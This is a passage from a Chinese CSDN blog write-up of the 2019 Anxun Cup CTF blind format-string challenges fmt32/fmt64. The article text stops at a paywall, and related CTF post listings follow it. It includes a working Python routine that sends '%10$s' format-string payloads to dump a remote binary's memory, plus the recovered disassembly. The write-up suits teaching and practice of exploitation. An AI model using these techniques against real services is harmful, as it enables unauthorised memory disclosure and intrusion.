【Pwn】2019安洵杯线上赛 fmt32 && fmt64

最新推荐文章于 2024-05-26 20:38:56 发布
最新推荐文章于 2024-05-26 20:38:56 发布
阅读量1k 收藏 2
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_36788573/article/details/103336928
版权

出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。

1.fmt32

只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。

def leak(addr):
    payload = "%10$s.TMP" + p32(addr)
    io.sendline(payload)
    print "leaking:", hex(addr)
    io.recvuntil('Repeater:')
    resp = io.recvuntil(".TMP")
    ret = resp[:-4:]
    print ret, len(ret)
    remain = io.recvrepeat(0.2)
    return ret

start_addr = 0x8048000
#leak(0x8048000)
text_seg = ''
try:
    while True:
        ret = leak(start_addr)
        text_seg += ret
        start_addr += len(ret)
        if start_addr>=0x8048b00:
            break
        if len(ret) == 0:
            start_addr += 1
            text_seg += '\x00'
except Exception as e:
    print e

print '[+]', len(text_seg)
with open('dump_bin', 'wb') as f:
    f.write(text_seg)

代码段差不多到0x8048b00就结束了,跑完之后放到ida中,找到代码段,下面应该是main函数,根据远程服务器的返回以及流程猜测对应函数吧。

seg000:08048605                 push    ebp
seg000:08048606                 mov     ebp, esp
seg000:08048608                 push    ecx
seg000:08048609                 sub     esp, 244h
seg000:0804860F                 mov     eax, large gs:14h
seg000:08048615                 mov     [ebp-0Ch], eax
seg000:08048618                 xor     eax, eax
seg000:0804861A                 mov     eax, ds:804A064h
seg000:0804861F                 sub     esp, 8
seg000:08048622                 push    0
seg000:08048624                 push    eax
seg000:08048625                 call    sub_8048450
seg000:0804862A                 add     esp, 10h
seg000:0804862D                 mov     eax, ds:804A060h
seg000:08048632                 sub     esp, 8
seg000:08048635                 push    0
seg000:08048637                 push    eax
seg000:08048638                 call    sub_8048450
seg000:0804863D                 add     esp, 10h
seg000:08048640                 mov     eax, ds:804A040h
seg000:08048645                 sub     esp, 8
seg000:08048648                 push    0
seg000:0804864A                 push    eax
seg000:0804864B                 call    sub_8048450
seg000:08048650                 add     esp, 10h
seg000:08048653                 sub     esp, 0Ch
seg000:08048656                 push    80487E0h
seg000:0804865B                 call    sub_8048490
seg000:08048660                 add     esp, 10h
seg000:08048663                 sub     esp, 0Ch
seg000:08048666                 push    804885Ch
seg000:0804866B                 call    sub_8048490
seg000:08048670                 add     esp, 10h
seg000:08048673                 mov     dword ptr [ebp-240h], 0
seg000:0804867D
seg000:0804867D loc_804867D: 							;循环
seg000:0804867D                 sub     esp, 0Ch
seg000:08048680                 push    3
seg000
最低0.47元/天 解锁文章
不干正事的拖延症患者
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn2019安洵杯线上赛 Heap
Nothing
12-01 453
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
BUUCTF [安洵2019]easy_web
zgwz123456的博客
02-11 700
进入到靶机中,在url里我们看见了两个参数一个是img,一个是cmd,显然cmd是给我们的一个后门函数,但是肯定没有这么简单,img则对应左上角的这张图片,让我们看一下源代码 这里面是图片base64编码的结果,然后我们把img参数里的base64进行解码,首先base64解码两次,再将得到的16进制转成字符串 这里得到555.png应该是左上角图片的名字,然后我们需要得到index.php的源码,看看它在干嘛,同样我们将index.php转成16进制,再进行base64编码2次,得到以下代码 &lt.
Pwn·fmt学习笔记
最新发布
qq_22607673的博客
05-26 823
pwn的blind fmt
[安洵2019]easy_web
weixin_51313108的博客
09-02 387
[安洵2019]easy_web解题的痛苦经历考点解题过程参考文章 解题的痛苦经历 每次解web题都是一次难忘的经历,这次也不意外。虽然途中有很多次奔溃了,但是没办法,菜就是原罪。通过这道题也学到不少知识。 GET和POST方法:这俩种请求方法在BP里不要随便修改这俩种方法在请求报文中有一定的差别,需要POST数据时请求方法要用POST不是GET。 hackbar和BP:选择这俩个方式提交请求也有区别,尽量不要使用hackbar来发请求然后BP再拦截请求,要用就用一个,用BP更好一些。 考点 信息
web-[安洵2019]easy_web
wojiushilsy的博客
08-29 350
题目要点题目内容解题 题目要点 文件包含 多重编码(base64 编码时末尾的 = 可以去掉 不影响) md5碰撞 linux命令行执行绕过 fuzz rce 题目内容 解题
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
axb_2019_fmt64
z1r0的博客
01-11 1676
axb_2019_fmt64 查看保护
BUUCTF之“axb_2019_fmt64
Probeginner的博客
12-15 3246
64位下格式化字符串漏洞,内存地址任意写
[BUUCTF-pwn]——axb_2019_fmt64
Y_peak的博客
03-09 404
[BUUCTF-pwn]——axb_2019_fmt64 题目地址:(https://buuoj.cn/challenges#axb_2019_fmt64)[https://buuoj.cn/challenges#axb_2019_fmt64] 这是一道格式化字符串漏洞利用的题目 checksec 一看,竟然连canary都没开,不过开不开好像都木有什么用。 在IDA中看看,可以看出明显的字符串漏洞 首先当然是计算偏移了,发送aaaa%4$x, 比较习惯发送这个hhhh。发现距离栈顶是3,还有五个寄
axb-2019-fmt64
Stella_Leo的博客
08-24 676
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019安洵杯。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got表。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
2019 安洵杯 Re 部分WP
Hk_Mayfly的博客
12-02 1887
0x01.EasyEncryption 测试文件:https://www.lanzous.com/i7soysb 1.IDA打开 int sub_416560() { int v0; // eax int v1; // edx int v2; // edx int v3; // ecx int v4; // ST08_4 char v6[4]; // [es...
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 2562
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修改地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
安洵杯-game-wp
令则
12-09 1216
game 安洵2019逆向 链接:https://pan.baidu.com/s/1vICnEqYfSezXUiTJU6C9TA 提取码:d9m7 题目的文件和idb分析文件和写出的python文件都给出了 首先进入函数发现时ollvm, 这次的分析是直接看那个伪代码,比以前好很多了,就简单写下分析的思路方法,然后后面的分析结果直接写成了python代码,同时的idb文件会同样在附赠文件中...
安洵杯-crackme-wp
令则
12-02 2389
crackme 这是安洵2019的逆向题 链接:https://pan.baidu.com/s/16fb_-L-dE5knUPzkSFU5rQ 提取码:z405 文章目录crackme逆向分析逆向脚本: 逆向分析 首先在ida并没有发现什么加密位置 下面的check函数如下: 只是简单的判定,其中的str2为明文,而str1却是从未出现的量。 (其实看到这个就想到了base64,而且可以...
安洵杯 RE CrackMe的WP
Zarcs_233的博客
12-01 1096
由于当天有事没参加,只能拿题看看了,觉得这道题很有意思。 稍微写写。 IDA打开,通过字符串定位到main函数 然后开始动调,到达红色位置出现了神奇的一幕,弹出的窗口不是Exception而是hook,挺有意思的,让后只能F7进去看看了。 hook技术类似于patch,将系统函数的调用执行流程给改掉了,这里似乎用的不是inline hook,用hook来隐藏代码也是绝了 F7 通过动态调试,可以看...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值